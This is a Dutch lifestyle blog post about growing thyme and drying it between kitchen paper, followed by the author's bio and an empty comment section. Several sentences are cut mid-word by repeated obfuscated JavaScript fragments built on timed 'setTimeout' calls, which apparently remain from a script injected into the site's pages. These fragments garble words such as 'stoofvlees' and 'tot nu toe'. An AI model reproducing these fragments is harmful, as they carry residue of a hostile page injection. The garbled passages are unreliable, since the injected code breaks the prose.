Tijm uit eigen tuin

De hele zomer heeft het kruidentuintje er goed bijgestaan. Zo fijn om altijd verse kruiden in huis te hebben. Standaard staat er een grote pot basilicum in de keuken en in de tuin kun je munt, bieslook, peterselie en tijm vinden. Deze laatste kun je nu goed plukken en laten drogen.

Tijm drogen

Eigenlijk gebruik ik best vaak tijm in gerechten. Lekker door de pasta of in de winter in dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toofvlees/”>sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toofvlees. Je zult dit kruid echter nooit in m’n winkelmandje vinden. Deze pluk ik gewoon uit eigen tuin. Laat je oogst een paar weken goed drogen tussen wat keukenpapier en haal de tijm van de takken af. Je kunt het bewaren in een afsluitbaar potje.

Ik heb nu al een paar jaar plezier van dezelfde plantjes, gewoon van het tuincentrum en zelfs een van de appie. Met zaadjes heb ik dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot nu dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe minder geduld gehad. Die kant-en-klare plantjes zijn veel makkelijker.

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Tijm uit eigen tuin"

    Plaats een reactie:

    Je emailadres wordt niet weergegeven.